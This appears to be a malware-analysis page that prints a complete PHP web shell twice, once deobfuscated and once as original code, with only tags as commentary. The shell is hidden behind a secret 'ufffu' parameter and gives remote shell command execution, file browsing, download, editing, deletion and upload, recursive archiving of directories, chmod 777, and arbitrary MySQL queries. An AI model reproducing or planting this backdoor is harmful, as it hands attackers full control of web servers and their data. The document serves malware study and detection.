PHP Malware Analysis

Back to list

Tags

Encoding
base64_decode
Execution
exec
Input
_GET
_POST
Environment
getcwd

Deobfuscated code

<?php

if (!isset($_REQUEST['ufffu'])) {
    die;
}
function isLinux($path)
{
    return substr($path, 0, 1) == "/" ? true : false;
}
function getSlashDir($isLinux)
{
    return $isLinux ? '/' : '\\';
}
$cwd = getcwd();
$isLinux = isLinux($cwd);
if (!$isLinux) {
    $driveLetter = substr($cwd, 0, 1);
}
$slash = getSlashDir($isLinux);
$parts = explode($slash, $cwd);
$rootDir = $isLinux ? $slash : $driveLetter . ':' . $slash;
function cleanPath($path, $isLinux)
{
    $slash = getSlashDir($isLinux);
    $parts = explode($slash, $path);
    foreach ($parts as $key => $val) {
        // Process '..' & '.' directories
        if ($val == "..") {
            $parts[$key] = "";
            $lastKey = $key - 1;
            $parts[$lastKey] = "";
        } elseif ($val == ".") {
            $parts[$key] = "";
        }
    }
    reset($parts);
    $fixedPath = $isLinux ? "/" : "";
    $firstPiece = true;
    foreach ($parts as $val) {
        if ($val != "") {
            $fixedPath .= ($firstPiece ? '' : $slash) . $val;
            $firstPiece = false;
        }
    }
    if ($fixedPath == "") {
        $fixedPath = $isLinux ? $slash : $driveLetter . ":" . $slash;
    }
    if (substr($fixedPath, -1) != $slash) {
        $fixedPath .= $slash;
    }
    return $fixedPath;
}
if (isset($_REQUEST['chm'])) {
    if (!$isLinux) {
        echo "This feature only works on Linux";
    } else {
        echo @chmod($_REQUEST['chm'], 0777) ? "Reassigned" : "Can't Reasign";
    }
} elseif (isset($_REQUEST['phpinfo'])) {
    phpinfo();
} elseif (isset($_REQUEST['dl'])) {
    if (@fopen($_REQUEST['dl'] . $_REQUEST['file'], 'r') == true) {
        $_REQUEST['dl'] .= $_REQUEST['file'];
        if (substr($_REQUEST['dl'], 0, 1) == $slash) {
            $fileArr = explode($slash, $_REQUEST['dl']);
        }
        header('Content-disposition: attachment; filename=' . $_REQUEST['file']);
        header('Content-type: application/octet-stream');
        readfile($_REQUEST['dl']);
    } else {
        echo $_REQUEST['dl'];
    }
} elseif (isset($_REQUEST["gz"])) {
    if (!$isLinux) {
        echo "This feature only works on Linux";
    } else {
        $directory = $_REQUEST["gz"];
        if (substr($directory, -1) == "/") {
            $directory = substr($directory, 0, -1);
        }
        $dirParts = explode($slash, $directory);
        $fname = $dirParts[sizeof($dirParts) - 1];
        $archive = time();
        exec("cd {$directory}; tar czf {$archive} *");
        $output = @file_get_contents($directory . "/" . $archive);
        if (!$output) {
            header("Content-disposition: attachment; filename=ACCESS_PROBLEM");
        } else {
            header("Content-disposition: attachment; filename={$fname}.tgz");
            echo $output;
        }
        header('Content-type: application/octet-stream');
        @unlink($directory . "/" . $archive);
    }
} elseif (isset($_REQUEST['f'])) {
    $filename = $_REQUEST['f'];
    $file = fopen("{$filename}", "rb");
    header("Content-Type: text/plain");
    fpassthru($file);
} elseif (isset($_REQUEST['d'])) {
    $d = $_REQUEST['d'];
    echo "<pre>";
    if ($handle = opendir("{$d}")) {
        echo "<h2>Listing of ";
        $conString = "";
        if ($isLinux) {
            echo "<a href='?d={$slash}'>{$slash}</a>";
        }
        foreach (explode($slash, cleanPath($d, $isLinux)) as $val) {
            $conString .= $val . $slash;
            echo "<a href='?d={$conString}'>" . $val . "</a>" . ($val != "" ? $slash : '');
        }
        echo " (<a target='_blank' href='?uploadForm=1&dir=" . urlencode(cleanPath($d, $isLinux)) . "'>upload file</a>) (<a href='?d=" . urlencode(cleanPath($d, $isLinux)) . "&hldb=1'>DB interaction files in red</a>)</h2> (<a target='_blank' href='?gz=" . urlencode(cleanPath($d, $isLinux)) . "'>gzip & download folder</a>) (<a target='_blank' href='?chm=" . urlencode(cleanPath($d, $isLinux)) . "'>chmod folder to 777)</a> (these rarely work)<br />";
        while ($dir = readdir($handle)) {
            if (is_dir("{$d}{$slash}{$dir}")) {
                if ($dir != "." && $dir != "..") {
                    $dirList[] = $dir;
                }
            } else {
                if (isset($_REQUEST["hldb"])) {
                    $contents = file_get_contents("{$d}{$slash}{$dir}");
                    if (stripos($contents, "mysql_") || stripos($contents, "mysqli_") || stripos($contents, "SELECT ")) {
                        $fileList[] = array('dir' => $dir, 'color' => 'red');
                    } else {
                        $fileList[] = array('dir' => $dir, 'color' => 'black');
                    }
                } else {
                    $fileList[] = array('dir' => $dir, 'color' => 'black');
                }
            }
        }
        echo "<a href='?d={$d}{$slash}.'><font color=grey>.\n</font></a>";
        echo "<a href='?d={$d}{$slash}..'><font color=grey>..\n</font></a>";
        // Some configurations throw a notice if is_array is tried with a non-existent variable
        if (isset($dirList)) {
            if (is_array($dirList)) {
                foreach ($dirList as $dir) {
                    echo "<a href='?d={$d}{$slash}{$dir}'><font color=grey>{$dir}\n</font></a>";
                }
            }
        }
        if (isset($fileList)) {
            if (is_array($fileList)) {
                foreach ($fileList as $dir) {
                    echo "<a href='?f={$d}" . $slash . $dir['dir'] . "'><font color=" . $dir['color'] . ">" . $dir['dir'] . "</font></a>" . "|<a href='?dl=" . cleanPath($d, $isLinux) . '&file=' . $dir["dir"] . "' target='_blank'>Download</a>|" . "|<a href='?ef=" . cleanPath($d, $isLinux) . '&file=' . $dir["dir"] . "' target='_blank'>Edit</a>|" . "|<a href='?df=" . cleanPath($d, $isLinux) . '&file=' . $dir["dir"] . "' target='_blank'>Delete</a>| \n";
                }
            }
        }
    } else {
        echo "opendir() failed";
    }
    closedir($handle);
    echo "</pre>";
} elseif (isset($_REQUEST['c'])) {
    if (@ini_get('safe_mode')) {
        echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programs in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ') <br />';
    }
    $USER_AGENT = strtolower(substr($_SERVER['HTTP_USER_AGENT'], 0, 4));
    $SILENT_MODE = TRUE;
    if ($USER_AGENT != "curl" && $USER_AGENT != "wget") {
        $SILENT_MODE = FALSE;
        echo "<h2>Command: <I>" . $_REQUEST['c'] . "</I></h2><br /><br />";
    }
    trim(exec($_REQUEST['c'] . ' 2>&1', $return, $returnedval));
    echo "<pre>Command exited with " . $returnedval . "</pre>";
    foreach ($return as $val) {
        if ($SILENT_MODE) {
            echo htmlentities($val);
        } else {
            echo '<pre>' . htmlentities($val) . '</pre>';
        }
    }
} elseif (isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"])) {
    if (isset($_FILES["file_name"])) {
        if ($_FILES["file_name"]["error"] > 0) {
            echo "Error";
        } else {
            $target_path = $_COOKIE["uploadDir"];
            if (substr($target_path, -1) != "/") {
                $target_path .= "/";
            }
            $target_path .= basename($_FILES['file_name']['name']);
            if (move_uploaded_file($_FILES['file_name']['tmp_name'], $target_path)) {
                setcookie("uploadDir", "");
                echo "The file " . basename($_FILES['file_name']['name']) . " has been uploaded";
            } else {
                echo "Error copying file, likely a permission error.";
            }
        }
    } else {
        ?>
        <form target="_blank" action="" method="GET">
            <input type="hidden" name="cc" value="1" />
            Submit this form before submitting file (will open in new window):<br />
            Upload Directory: <input type="text" name="dir" value="<?php 
        echo $_REQUEST["dir"];
        ?>"><br />
            <input type="submit" value="submit" />
        </form>
        <br /><br />

        <form enctype="multipart/form-data" action="" method="post">
        Upload file:<input name="file_name" type="file"><input type="submit" value="Upload" /></form>

<?php 
    }
} elseif (isset($_REQUEST['cc'])) {
    setcookie("uploadDir", $_GET["dir"]);
    echo "You are OK to upload the file, don't upload files to other directories before completing this upload.";
} elseif (isset($_REQUEST['mquery'])) {
    $host = $_REQUEST['host'];
    $usr = $_REQUEST['usr'];
    $passwd = $_REQUEST['passwd'];
    $db = $_REQUEST['db'];
    $mquery = $_REQUEST['mquery'];
    @mysql_connect($host, $usr, $passwd) or die("Connection Error: " . mysql_error());
    mysql_select_db($db);
    $result = mysql_query($mquery);
    if ($result != false) {
        echo "<h2>The following query has sucessfully executed</h2>" . htmlentities($mquery) . "<br /><br />";
        echo "Return Results:<br />";
        $first = true;
        echo "<table border='1'>";
        while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
            if ($first) {
                echo "<tr>";
                foreach ($row as $key => $val) {
                    echo "<td><b>{$key}</b></td>";
                }
                echo "</tr>";
                reset($row);
                $first = false;
            }
            echo "<tr>";
            foreach ($row as $val) {
                echo "<td>{$val}</td>";
            }
            echo "</tr>";
        }
        echo "</table>";
        mysql_free_result($result);
    } else {
        echo "Query Error: " . mysql_error();
    }
} elseif (isset($_REQUEST['df'])) {
    $_REQUEST['df'] .= $slash . $_REQUEST['file'];
    if (@unlink($_REQUEST['df'])) {
        echo "File deleted";
    } else {
        echo "Error deleting file";
    }
} elseif (isset($_REQUEST['ef'])) {
    ?>
<script type="text/javascript">
  <!--
  var key="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

  function encode64(inpStr)
  {
     inpStr=escape(inpStr);
     var output="";
     var chr1,chr2,chr3="";
     var enc1,enc2,enc3,enc4="";
     var i=0;

     do {
        chr1=inpStr.charCodeAt(i++);
        chr2=inpStr.charCodeAt(i++);
        chr3=inpStr.charCodeAt(i++);

        enc1=chr1 >> 2;
        enc2=((chr1 & 3) << 4) | (chr2 >> 4);
        enc3=((chr2 & 15) << 2) | (chr3 >> 6);
        enc4=chr3 & 63;

        if (isNaN(chr2))
        {
           enc3=enc4=64;
        }
        else if (isNaN(chr3))
        {
           enc4=64;
        }

        output=output +
           key.charAt(enc1) +
           key.charAt(enc2) +
           key.charAt(enc3) +
           key.charAt(enc4);
        chr1=chr2=chr3=enc1=enc2=enc3=enc4="";
     } while (i < inpStr.length);

     return output;
  }
  //-->
</script>
<?php 
    $_REQUEST['ef'] .= $_REQUEST['file'];
    if (isset($_POST["newcontent"])) {
        $_POST["newcontent"] = urldecode(base64_decode($_POST["newcontent"]));
        $stream = @fopen($_REQUEST['ef'], "w");
        if ($stream) {
            fwrite($stream, $_POST["newcontent"]);
            echo "Write sucessful";
        } else {
            echo "Could not write to file";
        }
        fclose($stream);
    }
    ?>
    <form action="" name="f" method="POST">
    <textarea wrap="off" rows="40" cols="130" name="newcontent"><?php 
    echo file_get_contents($_REQUEST['ef']);
    ?></textarea><br />
    <input type="submit" value="I base64 encoded it myself, don't run script" /><br />
    <input type="submit" value="Change (requires JavaScript to work)" onclick="document.f.newcontent.value=encode64(document.f.newcontent.value);" />
    </form>
<?php 
} else {
    ?>
<b>Server Information:</b><br />
<i>
Operating System: <?php 
    echo "PHP_OS";
    ?><br />
PHP Version: <?php 
    echo "PHP_VERSION";
    ?>&nbsp;&nbsp;&nbsp;<a href="?phpinfo=true">View phpinfo()</a>
</i>
<br />
<br />
<b>Directory Traversal</b><br />
<a href="?d=<?php 
    echo getcwd();
    ?>"><b>Go to current working directory</b></a><br />
<a href="?d=<?php 
    echo $rootDir;
    ?>"><b>Go to root directory</b></a><br />
<b>Go to any directory:</b><form action="" method="GET"><input type="text" name="d" value="<?php 
    echo $rootDir;
    ?>" /><input type="submit" value="Go" /></form>

<hr>ExeDcute MySQL Query:
<form action="" METHOD="GET">
<table>
<tr><td>host</td><td><input type="text" name="host"value="localhost"></td></tr>
<tr><td>user</td><td><input type="text" name="usr" value="root"></td></tr>
<tr><td>password</td><td><input type="text" name="passwd"></td></tr>
<tr><td>database</td><td><input type="text" name="db"></td></tr>
<tr><td valign="top">query</td><td><textarea name="mquery" rows="6" cols="65"></textarea></td></tr>
<tr><td colspan="2"><input type="submit" value="Execute"></td></tr>
</table>
</form>
<hr>
<pre><form action="" METHOD="GET">Execute Shell Command (safe mode is <?php 
    echo @ini_get('safe_mode') ? 'on' : 'off';
    ?>): <input type="text" name="c"><input type="submit" value="Go"></form></pre>
<?php 
}


Original code

<?php
if(!isset($_REQUEST['ufffu']))
die();
function isLinux($path){return (substr($path,0,1)=="/" ? true : false);}
function getSlashDir($isLinux){return($isLinux ? '/' : '\\');} $cwd=getcwd(); $isLinux=isLinux($cwd);
if(!$isLinux)
{ $driveLetter=substr($cwd,0,1);
} $slash=getSlashDir($isLinux); $parts=explode($slash,$cwd);
$rootDir=($isLinux ? $slash : ($driveLetter . ':' . $slash));
function cleanPath($path,$isLinux)
{
    $slash=getSlashDir($isLinux);
    $parts=explode($slash,$path);
    foreach($parts as $key=>$val)   // Process '..' & '.' directories
    {
        if($val=="..")
        {
            $parts[$key]="";
            $lastKey=$key-1;
            $parts[$lastKey]="";
        }
        elseif($val==".")
        {
            $parts[$key]="";
        }
    }
    reset($parts);
    $fixedPath=($isLinux ? "/" : "");
    $firstPiece=true;
    foreach($parts as $val)
    {
        if($val != "")
        {
            $fixedPath .=  ($firstPiece ? '' : $slash) . $val;
            $firstPiece=false;
        }
    }
    if($fixedPath=="")
    {
        $fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash));
    }
    if(substr($fixedPath,-1)!=$slash)
        $fixedPath .= $slash;
    return $fixedPath;
}
if(isset($_REQUEST['chm']))
{
    if(!$isLinux) {
        echo "This feature only works on Linux"; }
    else
    {
        echo (@chmod ($_REQUEST['chm'],0777) ? "Reassigned" : "Can't Reasign");
    }
}
elseif(isset($_REQUEST['phpinfo']))
{ phpinfo(); }
elseif(isset($_REQUEST['dl']))
{
    if(@fopen($_REQUEST['dl'] .  $_REQUEST['file'],'r')==true)
    {
        $_REQUEST['dl'] .= $_REQUEST['file'];
        if(substr($_REQUEST['dl'],0,1)==$slash)
            $fileArr=explode($slash,$_REQUEST['dl']);

        header('Content-disposition: attachment; filename=' . $_REQUEST['file']);
        header('Content-type: application/octet-stream');
        readfile($_REQUEST['dl']);
    }
    else
    {
        echo $_REQUEST['dl'];
    }
}
elseif(isset($_REQUEST["gz"]))
{
    if(!$isLinux)
    {
        echo "This feature only works on Linux";
    }
    else
    {
        $directory=$_REQUEST["gz"];

        if(substr($directory,-1)=="/")
            $directory=substr($directory,0,-1);

        $dirParts=explode($slash,$directory);
        $fname=$dirParts[(sizeof($dirParts)-1)];

        $archive=time();

        exec("cd $directory; tar czf $archive *");
        $output=@file_get_contents($directory . "/" . $archive);

        if(!$output)
            header("Content-disposition: attachment; filename=ACCESS_PROBLEM");
        else
        {
            header("Content-disposition: attachment; filename=$fname.tgz");
            echo $output;
        }

        header('Content-type: application/octet-stream');
        @unlink($directory . "/" . $archive);
    }
}
elseif(isset($_REQUEST['f']))
{
    $filename=$_REQUEST['f'];
    $file=fopen("$filename","rb");
    header("Content-Type: text/plain");
    fpassthru($file);
}
elseif(isset($_REQUEST['d']))
{
    $d=$_REQUEST['d'];
    echo "<pre>";
    if ($handle=opendir("$d"))
    {
        echo "<h2>Listing of ";
        $conString="";
        if($isLinux)
            echo "<a href='?d=$slash'>$slash</a>";
        foreach(explode($slash,cleanPath($d,$isLinux)) as $val)
        {
            $conString .= $val . $slash;
            echo "<a href='?d=$conString'>" . $val . "</a>" . ($val != "" ? $slash : '');
        }
        echo " (<a target='_blank' href='?uploadForm=1&dir=" . urlencode(cleanPath($d,$isLinux)) . "'>upload file</a>) (<a href='?d=" . urlencode(cleanPath($d,$isLinux)) . "&hldb=1'>DB interaction files in red</a>)</h2> (<a target='_blank' href='?gz=" . urlencode(cleanPath($d,$isLinux)) . "'>gzip & download folder</a>) (<a target='_blank' href='?chm=" . urlencode(cleanPath($d,$isLinux)) . "'>chmod folder to 777)</a> (these rarely work)<br />";
        while ($dir=readdir($handle))
        {
            if (is_dir("$d$slash$dir"))
            {
                if($dir != "." && $dir !="..")
                    $dirList[]=$dir;
            }
            else
            {
                if(isset($_REQUEST["hldb"]))
                {
                    $contents=file_get_contents("$d$slash$dir");
                    if (stripos($contents,"mysql_") || stripos($contents,"mysqli_") || stripos($contents,"SELECT "))
                    {
                        $fileList[]=array('dir'=>$dir,'color'=>'red');
                    }
                    else
                    {
                        $fileList[]=array('dir'=>$dir,'color'=>'black');
                    }
                }
                else
                {
                    $fileList[]=array('dir'=>$dir,'color'=>'black');
                }
            }
        }

        echo "<a href='?d=$d$slash.'><font color=grey>.\n</font></a>";
        echo "<a href='?d=$d$slash..'><font color=grey>..\n</font></a>";

        // Some configurations throw a notice if is_array is tried with a non-existent variable
        if(isset($dirList))
        if(is_array($dirList))
        foreach($dirList as $dir)
        {
                echo "<a href='?d=$d$slash$dir'><font color=grey>$dir\n</font></a>";
        }

        if(isset($fileList))
        if(is_array($fileList))
        foreach($fileList as $dir)
        {
            echo "<a href='?f=$d" . $slash . $dir['dir'] . "'><font color=" . $dir['color'] . ">" . $dir['dir'] . "</font></a>" .
                 "|<a href='?dl=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Download</a>|" .
                 "|<a href='?ef=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Edit</a>|" .
                 "|<a href='?df=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Delete</a>| \n";
        }
    }
    else
    echo "opendir() failed";
    closedir($handle);
    echo "</pre>";
}
elseif(isset($_REQUEST['c']))
{
    if(@ini_get('safe_mode'))
    {
        echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programs in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ') <br />';
    }
    $USER_AGENT=strtolower(substr($_SERVER['HTTP_USER_AGENT'],0,4));
    $SILENT_MODE=TRUE;
    if ($USER_AGENT != "curl" && $USER_AGENT != "wget")
    {
        $SILENT_MODE=FALSE;
        echo "<h2>Command: <I>" . $_REQUEST['c'] . "</I></h2><br /><br />";
    }
    trim(exec($_REQUEST['c'] . ' 2>&1',$return, $returnedval));
    echo "<pre>Command exited with " . $returnedval . "</pre>";
    foreach($return as $val)
    {
        if ($SILENT_MODE)
        {
            echo htmlentities($val);
        }
        else
        {
            echo '<pre>' . htmlentities($val) . '</pre>';
        }

    }
}
elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"]))
{
    if(isset($_FILES["file_name"]))
    {
        if ($_FILES["file_name"]["error"] > 0)
        {
                echo "Error";
        }
        else
        {
            $target_path=$_COOKIE["uploadDir"];
            if(substr($target_path,-1) != "/")
                $target_path .= "/";

            $target_path=$target_path . basename($_FILES['file_name']['name']);

            if(move_uploaded_file($_FILES['file_name']['tmp_name'],$target_path)) {
                setcookie("uploadDir","");
                echo "The file ".  basename($_FILES['file_name']['name']).
                " has been uploaded";
            }
            else
            {
                echo "Error copying file, likely a permission error.";
            }
        }
    }
    else
    {
?>
        <form target="_blank" action="" method="GET">
            <input type="hidden" name="cc" value="1" />
            Submit this form before submitting file (will open in new window):<br />
            Upload Directory: <input type="text" name="dir" value="<?php echo $_REQUEST["dir"]; ?>"><br />
            <input type="submit" value="submit" />
        </form>
        <br /><br />

        <form enctype="multipart/form-data" action="" method="post">
        Upload file:<input name="file_name" type="file"><input type="submit" value="Upload" /></form>

<?php
    }
}
elseif(isset($_REQUEST['cc']))
{
    setcookie("uploadDir",$_GET["dir"]);
    echo "You are OK to upload the file, don't upload files to other directories before completing this upload.";
}
elseif(isset($_REQUEST['mquery']))
{
    $host=$_REQUEST['host'];
    $usr=$_REQUEST['usr'];
    $passwd=$_REQUEST['passwd'];
    $db=$_REQUEST['db'];
    $mquery=$_REQUEST['mquery'];
    @mysql_connect($host,$usr,$passwd) or die("Connection Error: " . mysql_error());
    mysql_select_db($db);
    $result=mysql_query($mquery);
    if($result!=false)
    {
        echo "<h2>The following query has sucessfully executed</h2>" . htmlentities($mquery) . "<br /><br />";
        echo "Return Results:<br />";
        $first=true;
        echo "<table border='1'>";
        while ($row=mysql_fetch_array($result,MYSQL_ASSOC))
        {
            if($first)
            {
                echo "<tr>";
                foreach($row as $key=>$val)
                {
                    echo "<td><b>$key</b></td>";
                }
                echo "</tr>";
                reset($row);
                $first=false;
            }
            echo "<tr>";
            foreach($row as $val)
            {
                echo "<td>$val</td>";
            }
            echo "</tr>";
        }
        echo "</table>";
        mysql_free_result($result);
    }
    else
    {
        echo "Query Error: " . mysql_error();
    }
}
elseif(isset($_REQUEST['df']))
{
    $_REQUEST['df'] .= $slash . $_REQUEST['file'];
    if(@unlink($_REQUEST['df']))
    {
            echo "File deleted";
    }
    else
    {
            echo "Error deleting file";
    }
}
elseif(isset($_REQUEST['ef']))
{
?>
<script type="text/javascript">
  <!--
  var key="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

  function encode64(inpStr)
  {
     inpStr=escape(inpStr);
     var output="";
     var chr1,chr2,chr3="";
     var enc1,enc2,enc3,enc4="";
     var i=0;

     do {
        chr1=inpStr.charCodeAt(i++);
        chr2=inpStr.charCodeAt(i++);
        chr3=inpStr.charCodeAt(i++);

        enc1=chr1 >> 2;
        enc2=((chr1 & 3) << 4) | (chr2 >> 4);
        enc3=((chr2 & 15) << 2) | (chr3 >> 6);
        enc4=chr3 & 63;

        if (isNaN(chr2))
        {
           enc3=enc4=64;
        }
        else if (isNaN(chr3))
        {
           enc4=64;
        }

        output=output +
           key.charAt(enc1) +
           key.charAt(enc2) +
           key.charAt(enc3) +
           key.charAt(enc4);
        chr1=chr2=chr3=enc1=enc2=enc3=enc4="";
     } while (i < inpStr.length);

     return output;
  }
  //-->
</script>
<?php
    $_REQUEST['ef'] .= $_REQUEST['file'];
    if(isset($_POST["newcontent"]))
    {
        $_POST["newcontent"]=urldecode(base64_decode($_POST["newcontent"]));
        $stream=@fopen($_REQUEST['ef'],"w");

        if($stream)
        {
            fwrite($stream,$_POST["newcontent"]);
            echo "Write sucessful";
        }
        else
        {
            echo "Could not write to file";
        }
        fclose($stream);
    }
?>
    <form action="" name="f" method="POST">
    <textarea wrap="off" rows="40" cols="130" name="newcontent"><?php echo file_get_contents($_REQUEST['ef']); ?></textarea><br />
    <input type="submit" value="I base64 encoded it myself, don't run script" /><br />
    <input type="submit" value="Change (requires JavaScript to work)" onclick="document.f.newcontent.value=encode64(document.f.newcontent.value);" />
    </form>
<?php
}
else
{
?>
<b>Server Information:</b><br />
<i>
Operating System: <?php echo PHP_OS; ?><br />
PHP Version: <?php echo PHP_VERSION; ?>&nbsp;&nbsp;&nbsp;<a href="?phpinfo=true">View phpinfo()</a>
</i>
<br />
<br />
<b>Directory Traversal</b><br />
<a href="?d=<?php echo getcwd(); ?>"><b>Go to current working directory</b></a><br />
<a href="?d=<?php echo $rootDir; ?>"><b>Go to root directory</b></a><br />
<b>Go to any directory:</b><form action="" method="GET"><input type="text" name="d" value="<?php echo $rootDir; ?>" /><input type="submit" value="Go" /></form>

<hr>ExeDcute MySQL Query:
<form action="" METHOD="GET">
<table>
<tr><td>host</td><td><input type="text" name="host"value="localhost"></td></tr>
<tr><td>user</td><td><input type="text" name="usr" value="root"></td></tr>
<tr><td>password</td><td><input type="text" name="passwd"></td></tr>
<tr><td>database</td><td><input type="text" name="db"></td></tr>
<tr><td valign="top">query</td><td><textarea name="mquery" rows="6" cols="65"></textarea></td></tr>
<tr><td colspan="2"><input type="submit" value="Execute"></td></tr>
</table>
</form>
<hr>
<pre><form action="" METHOD="GET">Execute Shell Command (safe mode is <?php echo (@ini_get('safe_mode') ? 'on' : 'off'); ?>): <input type="text" name="c"><input type="submit" value="Go"></form></pre>
<?php
}